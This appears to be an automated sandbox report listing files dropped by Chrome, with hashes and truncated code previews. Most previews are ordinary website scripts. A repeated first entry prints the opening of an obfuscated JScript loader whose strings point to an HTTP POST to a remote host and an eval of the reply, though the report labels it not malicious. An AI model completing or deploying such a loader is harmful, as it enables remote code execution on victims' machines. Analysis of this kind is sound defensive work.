                                                                                                                                                                                                                                                                        Preview:/*@cc_on.function a0_0x4ef1(){var _0x35499a=['715yx','s4TzT','u.dem','2903616EFvZLO','a-ai.','Sleep','://en','Kh0hy','State','2.XML','25446VeorMg','keep-','send','Y3WhJ','1098szlUrC','EIosv','com/m','https','eXObj','MSXML','UjdF6','603424qPHZhA','open','vices','ready','POST','eval','Text','o.ezr','3hiGWrX','3g==','6195cRNvBz','7326280mHZNbR','alive','ction','+3i4r','HTTP','99agdERw','nse','ntSer','WSH','Conne','acTv6','Heade','1894319bxeSdg','quest','respo','ercha','338049hwHgPa','Activ','ect','setRe'];a0_0x4ef1=function(){return _0x35499a;};return a0_0x4ef1();}(function(_0x2c5072,_0x1dc913){var a0_0x5dde22={_0x5934cf:0x3d5,_0x8eff5b:0x3c5,_0x1f1c78:0x3c2,_0x1b6514:0x3ab,_0x2aa368:0x3b4,_0x2c4774:0x3b9,_0x33b991:0x3bb,_0xfc8b45:0x3d2,_0x2d72c0:0x3d7,_0x34b102:0x3c6,_0x530b08:0x3d2,_0x562900:0x3b0,_0x33335d:0x39f,_0x9581:0x3cd,_0x13aff6:0x3b9,_0xceddee:0x3dd,_0x411b9d:0x3ea,_0xdf2613:0x3d8,_0x59b3ae:0x3d1},a0_0x4c55f1={_0x4dd679:0x336},_0x56322=_0x2c5072();function _0x71e143(_0x26fdfb,_
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4104)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4117
                                                                                                                                                                                                                                                                        Entropy (8bit):5.05711795608586
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ROf/zELqzJRMmgQPx8OJtPT2ImC6Oq4Bflt:ROXzEWj/UOJtPAC33t
                                                                                                                                                                                                                                                                        MD5:B0823273C7DBA63CDD568FA7BA262153
                                                                                                                                                                                                                                                                        SHA1:816E9CD896813DA8DE46D80D1A444C5C4AFE0DD7
                                                                                                                                                                                                                                                                        SHA-256:03F381FA9F6C66DCF1C810BCDA049AE4221065A23383E434C38BCED0B53888CC
                                                                                                                                                                                                                                                                        SHA-512:5EF8400648B46885227D898D7966E4126811B28319339E41A7F0B5ADFA26E37C0D312C805B6EB710DE7E1451839FDA94A09EC48CB792896D9C5BD0DA23E1C835
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*@cc_on.function a0_0x4ef1(){var _0x35499a=['715yx','s4TzT','u.dem','2903616EFvZLO','a-ai.','Sleep','://en','Kh0hy','State','2.XML','25446VeorMg','keep-','send','Y3WhJ','1098szlUrC','EIosv','com/m','https','eXObj','MSXML','UjdF6','603424qPHZhA','open','vices','ready','POST','eval','Text','o.ezr','3hiGWrX','3g==','6195cRNvBz','7326280mHZNbR','alive','ction','+3i4r','HTTP','99agdERw','nse','ntSer','WSH','Conne','acTv6','Heade','1894319bxeSdg','quest','respo','ercha','338049hwHgPa','Activ','ect','setRe'];a0_0x4ef1=function(){return _0x35499a;};return a0_0x4ef1();}(function(_0x2c5072,_0x1dc913){var a0_0x5dde22={_0x5934cf:0x3d5,_0x8eff5b:0x3c5,_0x1f1c78:0x3c2,_0x1b6514:0x3ab,_0x2aa368:0x3b4,_0x2c4774:0x3b9,_0x33b991:0x3bb,_0xfc8b45:0x3d2,_0x2d72c0:0x3d7,_0x34b102:0x3c6,_0x530b08:0x3d2,_0x562900:0x3b0,_0x33335d:0x39f,_0x9581:0x3cd,_0x13aff6:0x3b9,_0xceddee:0x3dd,_0x411b9d:0x3ea,_0xdf2613:0x3d8,_0x59b3ae:0x3d1},a0_0x4c55f1={_0x4dd679:0x336},_0x56322=_0x2c5072();function _0x71e143(_0x26fdfb,_
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4104)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4117
                                                                                                                                                                                                                                                                        Entropy (8bit):5.05711795608586
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ROf/zELqzJRMmgQPx8OJtPT2ImC6Oq4Bflt:ROXzEWj/UOJtPAC33t
                                                                                                                                                                                                                                                                        MD5:B0823273C7DBA63CDD568FA7BA262153
                                                                                                                                                                                                                                                                        SHA1:816E9CD896813DA8DE46D80D1A444C5C4AFE0DD7
                                                                                                                                                                                                                                                                        SHA-256:03F381FA9F6C66DCF1C810BCDA049AE4221065A23383E434C38BCED0B53888CC
                                                                                                                                                                                                                                                                        SHA-512:5EF8400648B46885227D898D7966E4126811B28319339E41A7F0B5ADFA26E37C0D312C805B6EB710DE7E1451839FDA94A09EC48CB792896D9C5BD0DA23E1C835
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*@cc_on.function a0_0x4ef1(){var _0x35499a=['715yx','s4TzT','u.dem','2903616EFvZLO','a-ai.','Sleep','://en','Kh0hy','State','2.XML','25446VeorMg','keep-','send','Y3WhJ','1098szlUrC','EIosv','com/m','https','eXObj','MSXML','UjdF6','603424qPHZhA','open','vices','ready','POST','eval','Text','o.ezr','3hiGWrX','3g==','6195cRNvBz','7326280mHZNbR','alive','ction','+3i4r','HTTP','99agdERw','nse','ntSer','WSH','Conne','acTv6','Heade','1894319bxeSdg','quest','respo','ercha','338049hwHgPa','Activ','ect','setRe'];a0_0x4ef1=function(){return _0x35499a;};return a0_0x4ef1();}(function(_0x2c5072,_0x1dc913){var a0_0x5dde22={_0x5934cf:0x3d5,_0x8eff5b:0x3c5,_0x1f1c78:0x3c2,_0x1b6514:0x3ab,_0x2aa368:0x3b4,_0x2c4774:0x3b9,_0x33b991:0x3bb,_0xfc8b45:0x3d2,_0x2d72c0:0x3d7,_0x34b102:0x3c6,_0x530b08:0x3d2,_0x562900:0x3b0,_0x33335d:0x39f,_0x9581:0x3cd,_0x13aff6:0x3b9,_0xceddee:0x3dd,_0x411b9d:0x3ea,_0xdf2613:0x3d8,_0x59b3ae:0x3d1},a0_0x4c55f1={_0x4dd679:0x336},_0x56322=_0x2c5072();function _0x71e143(_0x26fdfb,_
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4104)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4117
                                                                                                                                                                                                                                                                        Entropy (8bit):5.05711795608586
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ROf/zELqzJRMmgQPx8OJtPT2ImC6Oq4Bflt:ROXzEWj/UOJtPAC33t
                                                                                                                                                                                                                                                                        MD5:B0823273C7DBA63CDD568FA7BA262153
                                                                                                                                                                                                                                                                        SHA1:816E9CD896813DA8DE46D80D1A444C5C4AFE0DD7
                                                                                                                                                                                                                                                                        SHA-256:03F381FA9F6C66DCF1C810BCDA049AE4221065A23383E434C38BCED0B53888CC
                                                                                                                                                                                                                                                                        SHA-512:5EF8400648B46885227D898D7966E4126811B28319339E41A7F0B5ADFA26E37C0D312C805B6EB710DE7E1451839FDA94A09EC48CB792896D9C5BD0DA23E1C835
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*@cc_on.function a0_0x4ef1(){var _0x35499a=['715yx','s4TzT','u.dem','2903616EFvZLO','a-ai.','Sleep','://en','Kh0hy','State','2.XML','25446VeorMg','keep-','send','Y3WhJ','1098szlUrC','EIosv','com/m','https','eXObj','MSXML','UjdF6','603424qPHZhA','open','vices','ready','POST','eval','Text','o.ezr','3hiGWrX','3g==','6195cRNvBz','7326280mHZNbR','alive','ction','+3i4r','HTTP','99agdERw','nse','ntSer','WSH','Conne','acTv6','Heade','1894319bxeSdg','quest','respo','ercha','338049hwHgPa','Activ','ect','setRe'];a0_0x4ef1=function(){return _0x35499a;};return a0_0x4ef1();}(function(_0x2c5072,_0x1dc913){var a0_0x5dde22={_0x5934cf:0x3d5,_0x8eff5b:0x3c5,_0x1f1c78:0x3c2,_0x1b6514:0x3ab,_0x2aa368:0x3b4,_0x2c4774:0x3b9,_0x33b991:0x3bb,_0xfc8b45:0x3d2,_0x2d72c0:0x3d7,_0x34b102:0x3c6,_0x530b08:0x3d2,_0x562900:0x3b0,_0x33335d:0x39f,_0x9581:0x3cd,_0x13aff6:0x3b9,_0xceddee:0x3dd,_0x411b9d:0x3ea,_0xdf2613:0x3d8,_0x59b3ae:0x3d1},a0_0x4c55f1={_0x4dd679:0x336},_0x56322=_0x2c5072();function _0x71e143(_0x26fdfb,_
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4104)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4117
                                                                                                                                                                                                                                                                        Entropy (8bit):5.05711795608586
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ROf/zELqzJRMmgQPx8OJtPT2ImC6Oq4Bflt:ROXzEWj/UOJtPAC33t
                                                                                                                                                                                                                                                                        MD5:B0823273C7DBA63CDD568FA7BA262153
                                                                                                                                                                                                                                                                        SHA1:816E9CD896813DA8DE46D80D1A444C5C4AFE0DD7
                                                                                                                                                                                                                                                                        SHA-256:03F381FA9F6C66DCF1C810BCDA049AE4221065A23383E434C38BCED0B53888CC
                                                                                                                                                                                                                                                                        SHA-512:5EF8400648B46885227D898D7966E4126811B28319339E41A7F0B5ADFA26E37C0D312C805B6EB710DE7E1451839FDA94A09EC48CB792896D9C5BD0DA23E1C835
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*@cc_on.function a0_0x4ef1(){var _0x35499a=['715yx','s4TzT','u.dem','2903616EFvZLO','a-ai.','Sleep','://en','Kh0hy','State','2.XML','25446VeorMg','keep-','send','Y3WhJ','1098szlUrC','EIosv','com/m','https','eXObj','MSXML','UjdF6','603424qPHZhA','open','vices','ready','POST','eval','Text','o.ezr','3hiGWrX','3g==','6195cRNvBz','7326280mHZNbR','alive','ction','+3i4r','HTTP','99agdERw','nse','ntSer','WSH','Conne','acTv6','Heade','1894319bxeSdg','quest','respo','ercha','338049hwHgPa','Activ','ect','setRe'];a0_0x4ef1=function(){return _0x35499a;};return a0_0x4ef1();}(function(_0x2c5072,_0x1dc913){var a0_0x5dde22={_0x5934cf:0x3d5,_0x8eff5b:0x3c5,_0x1f1c78:0x3c2,_0x1b6514:0x3ab,_0x2aa368:0x3b4,_0x2c4774:0x3b9,_0x33b991:0x3bb,_0xfc8b45:0x3d2,_0x2d72c0:0x3d7,_0x34b102:0x3c6,_0x530b08:0x3d2,_0x562900:0x3b0,_0x33335d:0x39f,_0x9581:0x3cd,_0x13aff6:0x3b9,_0xceddee:0x3dd,_0x411b9d:0x3ea,_0xdf2613:0x3d8,_0x59b3ae:0x3d1},a0_0x4c55f1={_0x4dd679:0x336},_0x56322=_0x2c5072();function _0x71e143(_0x26fdfb,_
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4104)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4117
                                                                                                                                                                                                                                                                        Entropy (8bit):5.05711795608586
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ROf/zELqzJRMmgQPx8OJtPT2ImC6Oq4Bflt:ROXzEWj/UOJtPAC33t
                                                                                                                                                                                                                                                                        MD5:B0823273C7DBA63CDD568FA7BA262153
                                                                                                                                                                                                                                                                        SHA1:816E9CD896813DA8DE46D80D1A444C5C4AFE0DD7
                                                                                                                                                                                                                                                                        SHA-256:03F381FA9F6C66DCF1C810BCDA049AE4221065A23383E434C38BCED0B53888CC
                                                                                                                                                                                                                                                                        SHA-512:5EF8400648B46885227D898D7966E4126811B28319339E41A7F0B5ADFA26E37C0D312C805B6EB710DE7E1451839FDA94A09EC48CB792896D9C5BD0DA23E1C835
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*@cc_on.function a0_0x4ef1(){var _0x35499a=['715yx','s4TzT','u.dem','2903616EFvZLO','a-ai.','Sleep','://en','Kh0hy','State','2.XML','25446VeorMg','keep-','send','Y3WhJ','1098szlUrC','EIosv','com/m','https','eXObj','MSXML','UjdF6','603424qPHZhA','open','vices','ready','POST','eval','Text','o.ezr','3hiGWrX','3g==','6195cRNvBz','7326280mHZNbR','alive','ction','+3i4r','HTTP','99agdERw','nse','ntSer','WSH','Conne','acTv6','Heade','1894319bxeSdg','quest','respo','ercha','338049hwHgPa','Activ','ect','setRe'];a0_0x4ef1=function(){return _0x35499a;};return a0_0x4ef1();}(function(_0x2c5072,_0x1dc913){var a0_0x5dde22={_0x5934cf:0x3d5,_0x8eff5b:0x3c5,_0x1f1c78:0x3c2,_0x1b6514:0x3ab,_0x2aa368:0x3b4,_0x2c4774:0x3b9,_0x33b991:0x3bb,_0xfc8b45:0x3d2,_0x2d72c0:0x3d7,_0x34b102:0x3c6,_0x530b08:0x3d2,_0x562900:0x3b0,_0x33335d:0x39f,_0x9581:0x3cd,_0x13aff6:0x3b9,_0xceddee:0x3dd,_0x411b9d:0x3ea,_0xdf2613:0x3d8,_0x59b3ae:0x3d1},a0_0x4c55f1={_0x4dd679:0x336},_0x56322=_0x2c5072();function _0x71e143(_0x26fdfb,_
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1488), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1488
                                                                                                                                                                                                                                                                        Entropy (8bit):5.209358371090319
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:FPeQL5YHkHyC6rU2H+KzA2FyaZHehAQgDC22GuRWUESk5bq4OCvDW:FF/HynA2z1EaZHAVxwUDkBlXDW
                                                                                                                                                                                                                                                                        MD5:AFFC037643FFCAEECA8F70B6E8CD0345
                                                                                                                                                                                                                                                                        SHA1:5636027C3E9EF61C558BEA32EB2CAFCDE5A8C738
                                                                                                                                                                                                                                                                        SHA-256:F2955A45CFD9EEDB8D37D2445970925F87F7BB38D8623C621439862A6431FD00
                                                                                                                                                                                                                                                                        SHA-512:64A8161C92B7F548B86900684D7195AE0D92A1D64FAB4F038EBB757329B0CC8E86252F2F67D31D1D650BF1AC2A85263F2D015D32470EC9D37A4B248EA8320F6C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:"use strict";!function(a,i,l,d){const s="ldcDataLayer";a[s]=a[s]||[];Object.defineProperty(a[s],"push",{value:function(...e){var t=Array.prototype.push.apply(this,e);return console.log("eventConsumer",e),t}});function t(){console.log("instrument",l,d);let e=function(t){for(let e=0;e<a[s].length;e++){var[n,r]=a[s][e];if(n===t)return r}},t=function(){var n=(new Date).getTime(),r="undefined"!=typeof performance&&performance.now&&1e3*performance.now()||0;return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(e){var t=16*Math.random();return 0<n?(t=(n+t)%16|0,n=Math.floor(n/16)):(t=(r+t)%16|0,r=Math.floor(r/16)),("x"===e?t:3&t|8).toString(16)})};var n,r,o;n=l,(r=new URLSearchParams).set("rurl",window.location.href),r.set("ref",i.referrer),r.set("v","js-0.1.0"),r.set("aid",d),(o=e("externalId"))&&r.set("external_id",o),r.set("rid",e("rid")||t()),o="https://tag.trovo-tag.com/"+n+"?"+r.toString(),(n=i.createElement("iframe")).setAttribute("src",o),n.setAttribute("height","1"),n.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8892), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8892
                                                                                                                                                                                                                                                                        Entropy (8bit):5.0731984341491
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:pDvu5/2Pbq1Ztbat1oeeC9X8UnZ/HuuwJgbClRL/YeFG/uW1evaO3Ve:pTw/4QOx+R8puVY
                                                                                                                                                                                                                                                                        MD5:FB15A10A641A318F91E7E912E4F9C184
                                                                                                                                                                                                                                                                        SHA1:BD41F67233FACB96976ED7B8E7207D52C03D340E
                                                                                                                                                                                                                                                                        SHA-256:F40767552E5E94B2D5F9A65D7F640CFA7D225298023DBD682095E040809A3D1A
                                                                                                                                                                                                                                                                        SHA-512:49570D36E5B1AE3C3A4965F7D054258FF676326BEE0D9399AA990926E9A762F699DE1D09078DEBADC43B363AE51D740BA33F2E8C64BB223A73D3C62872EBB3D2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(n,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(n="undefined"!=typeof globalThis?globalThis:n||self).LazyLoad=t()}(this,(function(){"use strict";function n(){return n=Object.assign||function(n){for(var t=1;t<arguments.length;t++){var e=arguments[t];for(var i in e)Object.prototype.hasOwnProperty.call(e,i)&&(n[i]=e[i])}return n},n.apply(this,arguments)}var t="undefined"!=typeof window,e=t&&!("onscroll"in window)||"undefined"!=typeof navigator&&/(gle|ing|ro)bot|crawl|spider/i.test(navigator.userAgent),i=t&&"IntersectionObserver"in window,o=t&&"classList"in document.createElement("p"),a=t&&window.devicePixelRatio>1,r={elements_selector:".lazy",container:e||t?document:null,threshold:300,thresholds:null,data_src:"src",data_srcset:"srcset",data_sizes:"sizes",data_bg:"bg",data_bg_hidpi:"bg-hidpi",data_bg_multi:"bg-multi",data_bg_multi_hidpi:"bg-multi-hidpi",data_bg_set:"bg-set",data_poster:"poster",class_ap
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4736), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4736
                                                                                                                                                                                                                                                                        Entropy (8bit):5.185210469000918
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:87ctmQUmNbEHSz3mQY12DfSgFxSiS18GHiX2EQ/bUFUvebNVK:KAWQY127xy1LS2EngoNVK
                                                                                                                                                                                                                                                                        MD5:49AB1107060459EC7FD9C909C582D5C0
                                                                                                                                                                                                                                                                        SHA1:8B867B54CF2D5D3FD27A86C4266EB890BDDED31B
                                                                                                                                                                                                                                                                        SHA-256:88097146861348EE171162A41B0E5308C98D3C903CF4AB9369FFD919ABFE8740
                                                                                                                                                                                                                                                                        SHA-512:A5EB1E00228AE60A2616391F58676137E96792C10A813B7FFE242B280FAFCBF3AC2269D73BA88D20182B749AA89A3793837CB9025B7E873A9E338DE6017D5CA5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var fusion={fusionResizeWidth:0,fusionResizeHeight:0,currentPostID:null,toBool:function(t){return 1===t||"1"===t||!0===t||"true"===t||"on"===t},restArguments:function(t,e){return e=null==e?t.length-1:+e,function(){for(var n,i=Math.max(arguments.length-e,0),o=Array(i),r=0;r<i;r++)o[r]=arguments[r+e];switch(e){case 0:return t.call(this,o);case 1:return t.call(this,arguments[0],o);case 2:return t.call(this,arguments[0],arguments[1],o)}for(n=Array(e+1),r=0;r<e;r++)n[r]=arguments[r];return n[e]=o,t.apply(this,n)}},debounce:function(t,e,n){var i,o,r,s,u,a=this;return r=function(e,n){i=null,n&&(o=t.apply(e,n))},(s=this.restArguments(function(s){return i&&clearTimeout(i),n?(u=!i,i=setTimeout(r,e),u&&(o=t.apply(this,s))):i=a.delay(r,e,this,s),o})).cancel=function(){clearTimeout(i),i=null},s},isSmall:function(){return Modernizr.mq("only screen and (max-width:"+fusionJSVars.visibility_small+"px)")},isMedium:function(){return Modernizr.mq("only screen and (min-width:"+(parseInt(fusionJSVars.visibi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (848), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                        Entropy (8bit):4.996471211787706
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t81CjPQk7QkjsV5qUq9Dv0GXWPLvUQbVQbA4+SPQk7QfI85qUq9Ry:NG5qVFuDBE65qVK
                                                                                                                                                                                                                                                                        MD5:EB94264335215BE9514298739E95272E
                                                                                                                                                                                                                                                                        SHA1:D0674168C4B3C641222F89C68240CEBA62144DC0
                                                                                                                                                                                                                                                                        SHA-256:ACBC257B1003FF58F518EA5C0DA86FA1F1731300E6958C244133A1D904F17B77
                                                                                                                                                                                                                                                                        SHA-512:A84B75EC14A60848F195883F9D188F4040CF9894D05F91F2621D99FA4A533AE01FC3E4EABA602A440617FCC3322F214052FB963627D3B252FDBE37D3CCE224DA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionInitTooltips(){jQuery('[data-toggle="tooltip"]').each(function(){var e;e=jQuery(this).parents(".fusion-header-wrapper").length?".fusion-header-wrapper":jQuery(this).parents("#side-header").length?"#side-header":"body",(!cssua.ua.mobile||cssua.ua.mobile&&"_blank"!==jQuery(this).attr("target"))&&jQuery(this).tooltip({container:e})})}jQuery(window).on("load",function(){fusionInitTooltips()}),jQuery(window).on("fusion-element-render-fusion_text fusion-element-render-fusion_social_links",function(e,t){var i,n=jQuery('div[data-cid="'+t+'"]').find('[data-toggle="tooltip"]');i=n.parents(".fusion-header-wrapper").length?".fusion-header-wrapper":n.parents("#side-header").length?"#side-header":"body",n.each(function(){(!cssua.ua.mobile||cssua.ua.mobile&&"_blank"!==jQuery(this).attr("target"))&&jQuery(this).tooltip({container:i})})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):776
                                                                                                                                                                                                                                                                        Entropy (8bit):5.830134255761454
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:Y2+S5HXnREIc3Li0oHXzQCkEogk4zeqEfOEamHX0n3Rx:Y2+mVk3EoX4rEWXWy3Rx
                                                                                                                                                                                                                                                                        MD5:20D7ADCC10F0F32AEFEE4F7D0D60FD50
                                                                                                                                                                                                                                                                        SHA1:BBC262C51EB027EA94CA754770606D724091755C
                                                                                                                                                                                                                                                                        SHA-256:CF365249A5444E7C502FF5D19EC70DA365C4B0271C29B81D471C8EA43EB29E58
                                                                                                                                                                                                                                                                        SHA-512:8B382E599E095C059C7C08E753AB7BBFCA9A6D9FB56E080C33ED29F6F12EC8DCADE89CCA9EEE9047D932FF198619D7BD4EACD3505AA5EEC28C6C90D0077A16E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:{"features":{"enc_get_req":true},"c":{"type":"hsw","req":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmIjowLCJzIjoyLCJ0IjoidyIsImQiOiI4QlBvU21uUkVEZGRiTE9KRHJ0dHB0ekN3VEdIVVVId1M1NGcyOVQrSVF1aDlLNnpBcUhmTk8zVkl0eVFjUHBWUysrOXc0OTk1TlppNGgySU8ySmNCUVY2VkhtSkVsWEtxcGs4Qm1teUd6OFhlSU0xVnhuaGQ4eE9aZnF5eGMyMUxwdWJsVDRoZFB6YkRsRlZ0NS9oVnVRQkpmemE2ck9VUmphdXpmeUNleHZ2NjIzOGVkSXEyN3ZpSk05MFhtMGRqeHVFeVQzREcrdXI0ekxNeGhRREtHaUt0QTg3Q2J1K0dYNTBqZVlBVVhKZzV6S0htR0paSG1qUVphRUlMa1U9UkJNb214UTZla3NGVG93ayIsImwiOiIvYy9mZThiZjVhMTZhOWRiNTA0ZjhhYmEyYWVjM2Y4ZjVlYjJjMDEzYmQ4YTgwZjYyNjhhYmJhZTAzZmU3NjBkNzU0IiwiaSI6InNoYTI1Ni1SbWxVTjgvSTZZR1ZyWjVwTkh2b3FNMDhvOFFXQjFaZW1JM3FlbGMrVUs4PSIsImUiOjE3MzQ3MDA1MjMsIm4iOiJoc3ciLCJjIjoxMDAwfQ.Xv7mJZ76LdXYiMpLLhhBZi1prHrbYGtn4e_Rjq4GEB4"},"pass":true}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3570), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3570
                                                                                                                                                                                                                                                                        Entropy (8bit):5.0524554954544785
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:1vw8VQq6KWorQfINES1EXQxnxsxixSrij2TEKyEy:WYQq6KVUfHSionKUMrij2YK9y
                                                                                                                                                                                                                                                                        MD5:9EAAE8BD6AAFED95E0187FFD478A3532
                                                                                                                                                                                                                                                                        SHA1:46ED6CAEC5004B8DB8064BA2BA5138E7444FB15D
                                                                                                                                                                                                                                                                        SHA-256:682FFD7D5677505F871C8ADCF4365FC8AA30C77AADDAA1C4D8338D1E02D30BD7
                                                                                                                                                                                                                                                                        SHA-512:CFCB93F0BD6240853697A6A3833AEE64670E7EAF516F13CB20B16B05A94BEAD1224520E5BADCE35003EA5E267B10E3C03829F444D077057AEAA0C2903CF31C18
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionCalculateResponsiveTypeValues(e,t,i,n){fusionSetOriginalTypographyData(n)}function fusionSetOriginalTypographyData(e){var t="string"==typeof e&&-1!==e.indexOf("fusion-slider"),i=fusion.getElements(e);jQuery(i).each(function(e,i){var n,o,s,a,r;n=fusionTypographyVars.typography_factor,i.classList.contains("fusion-responsive-typography-calculated")?i.style.getPropertyValue("--fontSize")&&""!==i.style.getPropertyValue("--fontSize")||i.classList.remove("fusion-responsive-typography-calculated"):null!==i.closest(".fusion-slider-revolution")||null!==i.closest(".rev_slider")||null!==i.closest("#layerslider-container")||null!==i.closest(".ls-avada.ls-container")||null!==i.closest(".fusion-slider-container")&&!t||(s=window.getComputedStyle(i),a=!!s["font-size"]&&parseFloat(s["font-size"]),r=!!s["line-height"]&&parseFloat(s["line-height"]),!1!==a&&!1!==r&&(r=Math.round(r/a*100)/100,i.style.setProperty("--fontSize",a),i.setAttribute("data-fontsize",a),i.style.lineHeight=r,i.setAttri
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9444)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):9612
                                                                                                                                                                                                                                                                        Entropy (8bit):5.396596143083989
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:TXz8EueXEVTzIszMIKynLKLAEdvjsr52aag++Hq2trdsF3AXnSATc525q4h:TXTWApynLK/ljsrpag++HBsOxTyA
                                                                                                                                                                                                                                                                        MD5:4D0398D56A32020EC6540C28E881ED88
                                                                                                                                                                                                                                                                        SHA1:F917C1F6AE47CB8D98E7664235B41701FDA6AE76
                                                                                                                                                                                                                                                                        SHA-256:4E1F46AB25E5766C609EE647AF355F0EF58027337739DAAA9B3F28AC160B1114
                                                                                                                                                                                                                                                                        SHA-512:3ED1188A67646355650A812960BBC9CD431903280A4F0D7021A3CEA6929BC5599140C5DDC0C73C55A1BDB5ADFAFEF98B6420F2B8F24C9D971033492A5C061C9B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/fileupload/fileupload.js?ver=1733842125
